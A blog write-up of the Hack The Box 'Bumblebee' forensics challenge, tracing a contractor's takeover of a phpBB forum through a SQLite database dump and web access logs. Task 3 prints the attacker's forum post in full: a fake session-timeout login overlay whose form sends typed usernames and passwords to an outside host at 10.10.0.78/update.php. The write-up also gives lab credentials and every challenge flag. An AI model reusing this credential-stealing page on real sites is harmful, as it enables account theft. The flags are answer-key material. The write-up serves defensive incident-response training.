Post

Bumblebee

Challenge

  • Name: Sherlock - Bumblebee
  • Difficulty: Easy
  • Scenario: An external contractor has accessed the internal forum here at Forela via the Guest WiFi and they appear to have stolen credentials for the administrative user! We have attached some logs from the forum and a full database dump in sqlite3 format to help you in your investigation.
  • Link: https://app.hackthebox.com/sherlocks/Bumblebee/play

Files

Download: bumblebee.zip (83 KB)

Tasks

Task 1

Description: What was the username of the external contractor? Masked Flag: ******1 Flag: apoole1

We can unzip the incident.tgz and dump the SQLite database suing the sqlite3 utility.

1
2
3
4
5
6
7
8
9
$ zipinfo bumblebee.zip               
Archive:  bumblebee.zip
Zip file size: 85136 bytes, number of entries: 1
?rw-------  2.0 unx    86837 b- defN 23-Nov-23 02:25 incident.tgz
1 file, 86837 bytes uncompressed, 85014 bytes compressed:  2.1%

$ tar -xvf incident.tgz 
./phpbb.sqlite3
access.log

We identify a registered users table called phpbb_users in the SQLite database, the table schema is listed below.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
CREATE TABLE `phpbb_users` (
  `user_id` integer  NOT NULL PRIMARY KEY AUTOINCREMENT
,  `user_type` integer NOT NULL DEFAULT 0
,  `group_id` integer  NOT NULL DEFAULT 3
,  `user_permissions` mediumtext NOT NULL
,  `user_perm_from` integer  NOT NULL DEFAULT 0
,  `user_ip` varchar(40) NOT NULL DEFAULT ''
,  `user_regdate` integer  NOT NULL DEFAULT 0
,  `username` varchar(255) NOT NULL DEFAULT ''
,  `username_clean` varchar(255) NOT NULL DEFAULT ''
,  `user_password` varchar(255) NOT NULL DEFAULT ''
,  `user_passchg` integer  NOT NULL DEFAULT 0
,  `user_email` varchar(100) NOT NULL DEFAULT ''
,  `user_email_hash` integer NOT NULL DEFAULT 0
,  `user_birthday` varchar(10) NOT NULL DEFAULT ''
,  `user_lastvisit` integer  NOT NULL DEFAULT 0
,  `user_lastmark` integer  NOT NULL DEFAULT 0
,  `user_lastpost_time` integer  NOT NULL DEFAULT 0
,  `user_lastpage` varchar(200) NOT NULL DEFAULT ''
,  `user_last_confirm_key` varchar(10) NOT NULL DEFAULT ''
,  `user_last_search` integer  NOT NULL DEFAULT 0
,  `user_warnings` integer NOT NULL DEFAULT 0
,  `user_last_warning` integer  NOT NULL DEFAULT 0
,  `user_login_attempts` integer NOT NULL DEFAULT 0
,  `user_inactive_reason` integer NOT NULL DEFAULT 0
,  `user_inactive_time` integer  NOT NULL DEFAULT 0
,  `user_posts` integer  NOT NULL DEFAULT 0
,  `user_lang` varchar(30) NOT NULL DEFAULT ''
,  `user_timezone` varchar(100) NOT NULL DEFAULT ''
,  `user_dateformat` varchar(64) NOT NULL DEFAULT 'd M Y H:i'
,  `user_style` integer  NOT NULL DEFAULT 0
,  `user_rank` integer  NOT NULL DEFAULT 0
,  `user_colour` varchar(6) NOT NULL DEFAULT ''
,  `user_new_privmsg` integer NOT NULL DEFAULT 0
,  `user_unread_privmsg` integer NOT NULL DEFAULT 0
,  `user_last_privmsg` integer  NOT NULL DEFAULT 0
,  `user_message_rules` integer  NOT NULL DEFAULT 0
,  `user_full_folder` integer NOT NULL DEFAULT -3
,  `user_emailtime` integer  NOT NULL DEFAULT 0
,  `user_topic_show_days` integer  NOT NULL DEFAULT 0
,  `user_topic_sortby_type` varchar(1) NOT NULL DEFAULT 't'
,  `user_topic_sortby_dir` varchar(1) NOT NULL DEFAULT 'd'
,  `user_post_show_days` integer  NOT NULL DEFAULT 0
,  `user_post_sortby_type` varchar(1) NOT NULL DEFAULT 't'
,  `user_post_sortby_dir` varchar(1) NOT NULL DEFAULT 'a'
,  `user_notify` integer  NOT NULL DEFAULT 0
,  `user_notify_pm` integer  NOT NULL DEFAULT 1
,  `user_notify_type` integer NOT NULL DEFAULT 0
,  `user_allow_pm` integer  NOT NULL DEFAULT 1
,  `user_allow_viewonline` integer  NOT NULL DEFAULT 1
,  `user_allow_viewemail` integer  NOT NULL DEFAULT 1
,  `user_allow_massemail` integer  NOT NULL DEFAULT 1
,  `user_options` integer  NOT NULL DEFAULT 230271
,  `user_avatar` varchar(255) NOT NULL DEFAULT ''
,  `user_avatar_type` varchar(255) NOT NULL DEFAULT ''
,  `user_avatar_width` integer  NOT NULL DEFAULT 0
,  `user_avatar_height` integer  NOT NULL DEFAULT 0
,  `user_sig` mediumtext NOT NULL
,  `user_sig_bbcode_uid` varchar(8) NOT NULL DEFAULT ''
,  `user_sig_bbcode_bitfield` varchar(255) NOT NULL DEFAULT ''
,  `user_jabber` varchar(255) NOT NULL DEFAULT ''
,  `user_actkey` varchar(32) NOT NULL DEFAULT ''
,  `user_newpasswd` varchar(255) NOT NULL DEFAULT ''
,  `user_form_salt` varchar(32) NOT NULL DEFAULT ''
,  `user_new` integer  NOT NULL DEFAULT 1
,  `user_reminded` integer NOT NULL DEFAULT 0
,  `user_reminded_time` integer  NOT NULL DEFAULT 0
,  UNIQUE (`username_clean`)
);

We can identify the last registered user of apoole1 which is the answer to the task.

1
2
3
4
❯ sqlite3 ./phpbb.sqlite3 .dump | fgrep 'INSERT INTO' | fgrep 'contractor'
..[snip]..
INSERT INTO phpbb_users VALUES(51,0,2,'',0,'10.10.0.78',1682420899,'apoole','apoole','$2y$10$Zdv/oKUxTjKLqQjL2oNWmuuFZUN9zNeJa0ka.R8RpQ4yqC4mAcQn.',1682423286,'apoole@contractor.net',312440918521,'',0,1682420899,0,'','',0,0,0,3,0,0,0,'en','Africa/Algiers','D M d, Y g:i a',1,0,'',0,0,0,0,-3,0,0,'t','d',0,'t','a',0,1,0,1,1,1,1,230271,'','',0,0,'','','','','','','xjogtb64yocxc2e4',0,0,0);
..[snip]..

Task 2

Description: What IP address did the contractor use to create their account? Masked Flag: X.X.X.X Flag: 10.10.0.78

From the previous task, we find the IP address used is 10.10.0.78, found in the 6th entry of the phpbb_users of the column user_ip.

1
INSERT INTO phpbb_users VALUES(51,0,2,'',0,'10.10.0.78',1682420899,'apoole','apoole','$2y$10$Zdv/oKUxTjKLqQjL2oNWmuuFZUN9zNeJa0ka.R8RpQ4yqC4mAcQn.',1682423286,'apoole@contractor.net',312440918521,'',0,1682420899,0,'','',0,0,0,3,0,0,0,'en','Africa/Algiers','D M d, Y g:i a',1,0,'',0,0,0,0,-3,0,0,'t','d',0,'t','a',0,1,0,1,1,1,1,230271,'','',0,0,'','','','','','','xjogtb64yocxc2e4',0,0,0);

We also noticed the following information in the phpbb_users table for the contractor:

  • User last post time: 1682425042 which when converted from Epoch time to date => Tue Apr 25 08:17:22 EDT 2023
  • User last page: viewtopic.php?f=2&t=2

Task 3

Description: What is the post_id of the malicious post that the contractor made? Masked Flag: * Flag: 9

We identify a posts table called phpbb_posts in the SQLite database, the table schema is listed below.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
CREATE TABLE `phpbb_posts` (
  `post_id` integer  NOT NULL PRIMARY KEY AUTOINCREMENT
,  `topic_id` integer  NOT NULL DEFAULT 0
,  `forum_id` integer  NOT NULL DEFAULT 0
,  `poster_id` integer  NOT NULL DEFAULT 0
,  `icon_id` integer  NOT NULL DEFAULT 0
,  `poster_ip` varchar(40) NOT NULL DEFAULT ''
,  `post_time` integer  NOT NULL DEFAULT 0
,  `post_reported` integer  NOT NULL DEFAULT 0
,  `enable_bbcode` integer  NOT NULL DEFAULT 1
,  `enable_smilies` integer  NOT NULL DEFAULT 1
,  `enable_magic_url` integer  NOT NULL DEFAULT 1
,  `enable_sig` integer  NOT NULL DEFAULT 1
,  `post_username` varchar(255) NOT NULL DEFAULT ''
,  `post_subject` varchar(255) NOT NULL DEFAULT ''
,  `post_text` mediumtext NOT NULL
,  `post_checksum` varchar(32) NOT NULL DEFAULT ''
,  `post_attachment` integer  NOT NULL DEFAULT 0
,  `bbcode_bitfield` varchar(255) NOT NULL DEFAULT ''
,  `bbcode_uid` varchar(8) NOT NULL DEFAULT ''
,  `post_postcount` integer  NOT NULL DEFAULT 1
,  `post_edit_time` integer  NOT NULL DEFAULT 0
,  `post_edit_reason` varchar(255) NOT NULL DEFAULT ''
,  `post_edit_user` integer  NOT NULL DEFAULT 0
,  `post_edit_count` integer  NOT NULL DEFAULT 0
,  `post_edit_locked` integer  NOT NULL DEFAULT 0
,  `post_visibility` integer NOT NULL DEFAULT 0
,  `post_delete_time` integer  NOT NULL DEFAULT 0
,  `post_delete_reason` varchar(255) NOT NULL DEFAULT ''
,  `post_delete_user` integer  NOT NULL DEFAULT 0
);

Looking at the posts in the phpbb_posts table, in post_id=9 a contractor named Alex Poole posted a malicious page.

1
2
3
❯ sqlite3 ./phpbb.sqlite3 .dump | fgrep 'INSERT INTO phpbb_posts'
INSERT INTO phpbb_posts VALUES(2,1,2,50,0,'10.255.254.2',1681832510,0,1,1,1,1,'','Introduction Randy Savage',replace('<t>Good Afternoon everyone!<br/>\n<br/>\nI am new to the administration team here at forela, I''d like to take a minute and say hello!<br/>\nI have 5 years of administration experience and am ecstatic to be joining this team<br/>\n<br/>\nRegards,<br/>\nRandy</t>','\n',char(10)),'59bbd9d7e6f899713d7c1da1016e4d25',0,'','3nk',1,0,'',0,0,0,1,1681832532,'',48);
INSERT INTO phpbb_posts VALUES(9,2,2,52,0,'10.10.0.78',1682425042,0,1,1,1,1,'','Hello Everyone','<div><style>body {    z-index: 100;}.modal {    position:fixed;    top:0;    left:0;    height:100%;    width:100%;    z-index:101;    background-color:white;    opacity:1;}.modal.hidden {    visibility: hidden;}</style><script type="text/javascript">function sethidden(){    const d = new Date();    d.setTime(d.getTime() + (24*60*60*1000));    let expires = "expires="+ d.toUTCString();    document.cookie = "phpbb_token=1;" + expires + ";";    var modal = document.getElementById(''zbzbz1234'');    modal.classList.add("hidden");}document.addEventListener("DOMContentLoaded", function(event) {    let cookieexists = false;    let name = "phpbb_token=";    let cookies = decodeURIComponent(document.cookie);    let ca = cookies.split('';'');    for(let i = 0; i < ca.length; i++)    {        let c = ca[i];        while(c.charAt(0) == '' '')        {            c = c.substring(1);        }        if(c.indexOf(name) == 0) {            cookieexists = true;        }    }    if(cookieexists){        return;    }    var modal = document.getElementById(''zbzbz1234'');    modal.classList.remove("hidden");});</script><iframe name="hiddenframe" id="hiddenframe" style="display:none"></iframe>    <div class="modal hidden" id="zbzbz1234" onload="shouldshow">    <div id="wrap" class="wrap">        <a id="top" class="top-anchor" accesskey="t"></a>        <div id="page-header">            <div class="headerbar" role="banner">                <div class="inner">                    <div id="site-description" class="site-description">                    <a id="logo" class="logo" href="./index.php" title="Board index"><span class="site_logo"></span></a>                    <h1>forum.forela.co.uk</h1>                    <p>Forela internal forum</p>                    <p class="skiplink"><a href="#start_here">Skip to content</a></p>                </div>                    <div id="search-box" class="search-box search-header" role="search">                    <form action="./search.php" method="get" id="search1">                    <fieldset>                        <input name="keywords" id="keywords1" type="search" maxlength="128" title="Search for keywords" class="inputbox search tiny" size="20" value="" placeholder="Search…">                        <button class="button button-search" type="submit" title="Search">                            <i class="icon fa-search fa-fw" aria-hidden="true"></i><span class="sr-only">Search</span>                        </button>                        <a href="./search.php" class="button button-search-end" title="Advanced search">                            <i class="icon fa-cog fa-fw" aria-hidden="true"></i><span class="sr-only">Advanced search</span>                        </a>                    </fieldset>                    </form>                </div>                    </div>            </div>    <div class="navbar" role="navigation">        <div class="inner">            <ul id="nav-main" class="nav-main linklist" role="menubar">                <li id="quick-links" class="quick-links dropdown-container responsive-menu" data-skip-responsive="true">                <a href="#" class="dropdown-trigger dropdown-toggle">                    <i class="icon fa-bars fa-fw" aria-hidden="true"></i><span>Quick links</span>                </a>                <div class="dropdown">                    <div class="pointer"><div class="pointer-inner"></div></div>                    <ul class="dropdown-contents" role="menu">                                <li class="separator"></li>                                <li>                                    <a href="./search.php?search_id=unanswered" role="menuitem">                                        <i class="icon fa-file-o fa-fw icon-gray" aria-hidden="true"></i><span>Unanswered topics</span>                                    </a>                                </li>                                <li>                                    <a href="./search.php?search_id=active_topics" role="menuitem">                                        <i class="icon fa-file-o fa-fw icon-blue" aria-hidden="true"></i><span>Active topics</span>                                    </a>                                </li>                                <li class="separator"></li>                                <li>                                    <a href="./search.php" role="menuitem">                                        <i class="icon fa-search fa-fw" aria-hidden="true"></i><span>Search</span>                                    </a>                                </li>                            <li class="separator"></li>                        </ul>                </div>            </li>                <li data-skip-responsive="true">                <a href="/phpBB3/app.php/help/faq" rel="help" title="Frequently Asked Questions" role="menuitem">                    <i class="icon fa-question-circle fa-fw" aria-hidden="true"></i><span>FAQ</span>                </a>                            <li class="rightside" data-skip-responsive="true">                <a href="./ucp.php?mode=login" title="Login" accesskey="x" role="menuitem">                    <i class="icon fa-power-off fa-fw" aria-hidden="true"></i><span>Login</span>                </a>            </li>                <li class="rightside" data-skip-responsive="true">                    <a href="./ucp.php?mode=register" role="menuitem">                        <i class="icon fa-pencil-square-o  fa-fw" aria-hidden="true"></i><span>Register</span>                    </a>                </li>        </li data-skip-responsive="true"></ul>            <ul id="nav-breadcrumbs" class="nav-breadcrumbs linklist navlinks" role="menubar">            <li class="breadcrumbs" itemscope="" itemtype="http://schema.org/BreadcrumbList" style="max-width: 936px;">                    <span class="crumb" itemtype="http://schema.org/ListItem" itemprop="itemListElement" itemscope=""><a href="./index.php" itemtype="https://schema.org/Thing" itemprop="item" accesskey="h" data-navbar-reference="index" title="Board index"><i class="icon fa-home fa-fw"></i><span itemprop="name">Board index</span></a><meta itemprop="position" content="1"></span>                </li>                    <li class="rightside responsive-search">                    <a href="./search.php" title="View the advanced search options" role="menuitem">                        <i class="icon fa-search fa-fw" aria-hidden="true"></i><span class="sr-only">Search</span>                    </a>                </li>        </ul>            </div>    </div>        </div>                <a id="start_here" class="anchor"></a>        <div id="page-body" class="page-body" role="main">                <div class="panel">                <div class="inner">                        <div class="content">                    <h3>Session Timeout</h3>		    <br/>		    <br/>                    <p>Your session token has timed out in order to proceed you must login again.</p>                </div>                        </div>            </div>    <form action="http://10.10.0.78/update.php" method="post" id="login" data-focus="username" target="hiddenframe">    <div class="panel">        <div class="inner">            <div class="content">            <h2 class="login-title">Login</h2>                <fieldset class="fields1">            <dl>                <dt><label for="username">Username:</label></dt>                <dd><input type="text" tabindex="1" name="username" id="username" size="25" value="" class="inputbox autowidth"></dd>            </dl>            <dl>                <dt><label for="password">Password:</label></dt>                <dd><input type="password" tabindex="2" id="password" name="password" size="25" class="inputbox autowidth" autocomplete="off"></dd>            </dl>            <dl>    <dd><label for="autologin"><input type="checkbox" name="autologin" id="autologin" tabindex="4">Remember me</label></dd>			<dd><label for="viewonline"><input type="checkbox" name="viewonline" id="viewonline" tabindex="5">Hide my online status this session</label></dd>            </dl>                <dl>                <dt>&nbsp;</dt>                <dd>    <input type="submit" name="login" tabindex="6" value="Login" class="button1" onclick="sethidden()"></dd>            </dl>                    </fieldset class="fields1"></div>            </div>    </div>        </form>            </div>            <div id="page-footer" class="page-footer" role="contentinfo">    <div class="navbar" role="navigation">        <div class="inner">            <ul id="nav-footer" class="nav-footer linklist" role="menubar">            <li class="breadcrumbs">    <span class="crumb"><a href="./index.php" data-navbar-reference="index" title="Board index"><i class="icon fa-home fa-fw" aria-hidden="true"></i><span>Board index</span></a></span>		</li>                <li class="responsive-menu hidden rightside dropdown-container"><a href="javascript:void(0);" class="js-responsive-menu-link responsive-menu-link dropdown-toggle"><i class="icon fa-bars fa-fw" aria-hidden="true"></i></a><div class="dropdown"><div class="pointer"><div class="pointer-inner"></div></div><ul class="dropdown-contents"></ul></div></li><li class="rightside">All times are <span title="UTC">UTC</span></li>                <li class="rightside">                    <a href="./ucp.php?mode=delete_cookies" data-ajax="true" data-refresh="true" role="menuitem">                        <i class="icon fa-trash fa-fw" aria-hidden="true"></i><span>Delete cookies</span>                    </a>                </li>        </ul>            </div>    </div>            <div class="copyright">            <p class="footer-row">                <span class="footer-copyright">Powered by <a href="https://www.phpbb.com/">phpBB</a>® Forum Software © phpBB Limited</span>            </p>            <p class="footer-row">                <a class="footer-link" href="./ucp.php?mode=privacy" title="Privacy" role="menuitem">                    <span class="footer-link-text">Privacy</span>                </a>                |                <a class="footer-link" href="./ucp.php?mode=terms" title="Terms" role="menuitem">                    <span class="footer-link-text">Terms</span>                </a>            </p>        </div>            <div id="darkenwrapper" class="darkenwrapper" data-ajax-error-title="AJAX error" data-ajax-error-text="Something went wrong when processing your request." data-ajax-error-text-abort="User aborted request." data-ajax-error-text-timeout="Your request timed out; please try again." data-ajax-error-text-parsererror="Something went wrong with the request and the server returned an invalid reply.">            <div id="darken" class="darken">&nbsp;</div>        </div>            <div id="phpbb_alert" class="phpbb_alert" data-l-err="Error" data-l-timeout-processing-req="Request timed out.">            <a href="#" class="alert_close">                <i class="icon fa-times-circle fa-fw" aria-hidden="true"></i>            </a>            <h3 class="alert_title">&nbsp;</h3><p class="alert_text"></p>        </div>        <div id="phpbb_confirm" class="phpbb_alert">            <a href="#" class="alert_close">                <i class="icon fa-times-circle fa-fw" aria-hidden="true"></i>            </a>            <div class="alert_text"></div>        </div>    </div>        </div>        <div>        <a id="bottom" class="anchor" accesskey="z"></a>    <img src="./cron.php?cron_type=cron.task.core.tidy_warnings" width="1" height="1" alt="cron"></div></div><span>Greetings everyone,<br>	<br>	I am just a visiting IT Contractor, it''s a fantastic company y''all have here.<br>	I hope to work with you all again soon.<br>	<br>	Regards,<br>Alex Poole</span></div>','d2788f4645ab450a05b1832b98d98d0f',0,'','af1z987',1,0,'',0,0,0,1,0,'',0);

Task 4

Description: What is the full URI that the credential stealer sends its data to? Masked Flag: *****//**.**.*.**/******.**p Flag: http://10.10.0.78/update.php

Looking at the post by the contractor (found in the previous task), we can identify the malicious URL that the credential stealer code sends the data to:

1
<form action="http://10.10.0.78/update.php" method="post" id="login" data-focus="username" target="hiddenframe">

Task 5

Description: When did the contractor log into the forum as the administrator? (UTC) Masked Flag: DD/MM/YYYY HH:mm:ss Flag: 26/04/2023 10:53:12

Looking at the access log for the contractors IP and login request.

1
2
3
cat access.log | fgrep '10.10.0.78' | fgrep 'login' | fgrep 'POST' | fgrep '302' | sort -u
10.10.0.78 - - [25/Apr/2023:13:15:48 +0100] "POST /ucp.php?mode=login&sid=c587ec8329ee2e1d9d210882f46d09eb HTTP/1.1" 302 632 "http://10.10.0.27/ucp.php?mode=login&sid=c587ec8329ee2e1d9d210882f46d09eb" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
10.10.0.78 - - [26/Apr/2023:11:53:01 +0100] "POST /ucp.php?mode=login&sid=894e8c0e8171f709103b4a4b5b932d95 HTTP/1.1" 302 633 "http://10.10.0.27/ucp.php?mode=login&sid=894e8c0e8171f709103b4a4b5b932d95" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"

However this did not work as it was not the intended path.

We identify a logs table called phpbb_log in the SQLite database, the table schema is listed below.

1
2
3
4
5
6
7
8
9
10
11
12
13
CREATE TABLE `phpbb_log` (
  `log_id` integer  NOT NULL PRIMARY KEY AUTOINCREMENT
,  `log_type` integer NOT NULL DEFAULT 0
,  `user_id` integer  NOT NULL DEFAULT 0
,  `forum_id` integer  NOT NULL DEFAULT 0
,  `topic_id` integer  NOT NULL DEFAULT 0
,  `post_id` integer  NOT NULL DEFAULT 0
,  `reportee_id` integer  NOT NULL DEFAULT 0
,  `log_ip` varchar(40) NOT NULL DEFAULT ''
,  `log_time` integer  NOT NULL DEFAULT 0
,  `log_operation` text NOT NULL
,  `log_data` mediumtext NOT NULL
);

Looking at the logs in the phpbb_log table, in log_id=61 we identified when LOG_ADMIN_AUTH_SUCCESS at epoch time 1682506392.

1
2
3
4
..[snip]...
INSERT INTO phpbb_log VALUES(61,0,48,0,0,0,0,'10.10.0.78',1682506392,'LOG_ADMIN_AUTH_SUCCESS','');
INSERT INTO phpbb_log VALUES(62,0,48,0,0,0,0,'10.10.0.78',1682506431,'LOG_USERS_ADDED','a:2:{i:0;s:14:"Administrators";i:1;s:6:"apoole";}');
INSERT INTO phpbb_log VALUES(63,0,48,0,0,0,0,'10.10.0.78',1682506471,'LOG_DB_BACKUP','');

Converting Epoch 1682506392 to flag format: DD/MM/YYYY HH:mm:ss can be achieved as shown below:

1
2
python3 -c 'from datetime import datetime; print(datetime.utcfromtimestamp(1682506392).strftime("%d/%m/%Y %H:%M:%S"))'
26/04/2023 10:53:12

Task 6

Description: In the forum there are plaintext credentials for the LDAP connection, what is the password? Masked Flag: ********1 Flag: Passw0rd1

We are able to identify the LDAP password of Passw0rd1, found in the phpbb_config table.

1
2
3
4
5
6
7
8
9
10
❯ sqlite3 ./phpbb.sqlite3 .dump | fgrep 'ldap'
INSERT INTO phpbb_config VALUES('auth_method','db_or_ldap',0);
INSERT INTO phpbb_config VALUES('ldap_base_dn','OU=Forela,DC=forela,DC=local',0);
INSERT INTO phpbb_config VALUES('ldap_email','',0);
INSERT INTO phpbb_config VALUES('ldap_password','Passw0rd1',0);
INSERT INTO phpbb_config VALUES('ldap_port','',0);
INSERT INTO phpbb_config VALUES('ldap_server','10.10.0.11',0);
INSERT INTO phpbb_config VALUES('ldap_uid','sAMAccountName',0);
INSERT INTO phpbb_config VALUES('ldap_user','CN=phpbb-admin,OU=Service,OU=Forela,DC=forela,DC=local',0);
INSERT INTO phpbb_config VALUES('ldap_user_filter','',0);

Task 7

Description: What is the user agent of the Administrator user? Masked Flag: *******/*.* (*********; ***** *** ** * **_**_*) ***********/***.** (*****, **** *****) ******/***.*.*.* ******/***.*6 Flag: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36

Looking at the access.log log file, we can first identify the administrative page, as the contractor accessed it last.

1
2
cat access.log | fgrep '10.10.0.78' | tail -n1
10.10.0.78 - - [26/Apr/2023:12:01:53 +0100] "GET /index.php?sid=be3cc6e2de08bafa4044f552813e2cbe HTTP/1.1" 200 3796 "http://10.10.0.27/adm/index.php?sid=eca30c1b75dc3eed1720423aa1ff9577&i=acp_database&mode=backup" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"

Now we can identify the administrator from the /adm/index.php endpoint. The user-agent is listed as Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 below.

1
2
cat access.log | fgrep -v '10.10.0.78' | fgrep '/adm/index.php' | tail -n1
10.255.254.2 - - [25/Apr/2023:13:17:32 +0100] "GET /index.php?sid=041ca559047513ba2267dfc066187582 HTTP/1.1" 200 4348 "http://10.10.0.27/adm/index.php?i=acp_board&sid=041ca559047513ba2267dfc066187582&mode=auth" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"

Task 8

Description: What time did the contractor add themselves to the Administrator group? (UTC) Masked Flag: DD/MM/YYYY HH:mm:ss Flag: 26/04/2023 10:53:51

Looking at the logs in the phpbb_log table, in log_id=61 we identified when LOG_USERS_ADDED at epoch time 1682506431.

1
2
3
4
..[snip]...
INSERT INTO phpbb_log VALUES(61,0,48,0,0,0,0,'10.10.0.78',1682506392,'LOG_ADMIN_AUTH_SUCCESS','');
INSERT INTO phpbb_log VALUES(62,0,48,0,0,0,0,'10.10.0.78',1682506431,'LOG_USERS_ADDED','a:2:{i:0;s:14:"Administrators";i:1;s:6:"apoole";}');
INSERT INTO phpbb_log VALUES(63,0,48,0,0,0,0,'10.10.0.78',1682506471,'LOG_DB_BACKUP','');

Converting Epoch 1682506392 to flag format: DD/MM/YYYY HH:mm:ss can be achieved as shown below:

1
2
python3 -c 'from datetime import datetime; print(datetime.utcfromtimestamp(1682506431).strftime("%d/%m/%Y %H:%M:%S"))'
26/04/2023 10:53:51

Task 9

Description: What time did the contractor download the database backup? (UTC) Masked Flag: DD/MM/YYYY HH:mm:ss Flag: 26/04/2023 11:01:38

Looking at the logs in the phpbb_log table, in log_id=61 we identified when LOG_DB_BACKUP at epoch time 1682506471.

1
2
3
4
..[snip]...
INSERT INTO phpbb_log VALUES(61,0,48,0,0,0,0,'10.10.0.78',1682506392,'LOG_ADMIN_AUTH_SUCCESS','');
INSERT INTO phpbb_log VALUES(62,0,48,0,0,0,0,'10.10.0.78',1682506431,'LOG_USERS_ADDED','a:2:{i:0;s:14:"Administrators";i:1;s:6:"apoole";}');
INSERT INTO phpbb_log VALUES(63,0,48,0,0,0,0,'10.10.0.78',1682506471,'LOG_DB_BACKUP','');

Converting Epoch 1682506471 to flag format: DD/MM/YYYY HH:mm:ss can be achieved as shown below:

1
2
python3 -c 'from datetime import datetime; print(datetime.utcfromtimestamp(1682506471).strftime("%d/%m/%Y %H:%M:%S"))'
26/04/2023 10:54:31

However this did not work as it was not the intended path.

Looking at the access.log, we identify a GET request that was pulling a backup from the webserver at the endpoint /store/backup_1682506471_dcsr71p7fyijoyq8.sql.gz.

1
2
3
4
5
6
cat access.log | fgrep '10.10.0.78' | fgrep 'backup' | fgrep 'GET' | fgrep '200' | tail -n5
10.10.0.78 - - [26/Apr/2023:11:57:07 +0100] "GET /adm/index.php?sid=eca30c1b75dc3eed1720423aa1ff9577&i=acp_database&mode=backup HTTP/1.1" 200 3770 "http://10.10.0.27/adm/index.php?sid=eca30c1b75dc3eed1720423aa1ff9577&i=acp_logs&mode=admin" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
10.10.0.78 - - [26/Apr/2023:11:57:36 +0100] "GET /adm/index.php?sid=eca30c1b75dc3eed1720423aa1ff9577&i=21 HTTP/1.1" 200 3431 "http://10.10.0.27/adm/index.php?sid=eca30c1b75dc3eed1720423aa1ff9577&i=acp_database&mode=backup" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
10.10.0.78 - - [26/Apr/2023:12:01:09 +0100] "GET /adm/index.php?sid=eca30c1b75dc3eed1720423aa1ff9577&i=acp_database&mode=backup HTTP/1.1" 200 3770 "http://10.10.0.27/adm/index.php?sid=eca30c1b75dc3eed1720423aa1ff9577&i=25" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
10.10.0.78 - - [26/Apr/2023:12:01:38 +0100] "GET /store/backup_1682506471_dcsr71p7fyijoyq8.sql.gz HTTP/1.1" 200 34707 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
10.10.0.78 - - [26/Apr/2023:12:01:53 +0100] "GET /index.php?sid=be3cc6e2de08bafa4044f552813e2cbe HTTP/1.1" 200 3796 "http://10.10.0.27/adm/index.php?sid=eca30c1b75dc3eed1720423aa1ff9577&i=acp_database&mode=backup" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"

This request was done at at 26/Apr/2023:12:01:38 +0100. Converting this to the desired format (UTC), we can just subtract an hour and obtain 26/04/2023 11:01:38.

Task 10

Description: What was the size in bytes of the database backup as stated by access.log? Masked Flag: ****7 Flag: 34707

From the previous task, we find that there was 34707 bytes transferred in the GET request.

1
10.10.0.78 - - [26/Apr/2023:12:01:38 +0100] "GET /store/backup_1682506471_dcsr71p7fyijoyq8.sql.gz HTTP/1.1" 200 34707 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
This post is licensed under CC BY 4.0 by the author.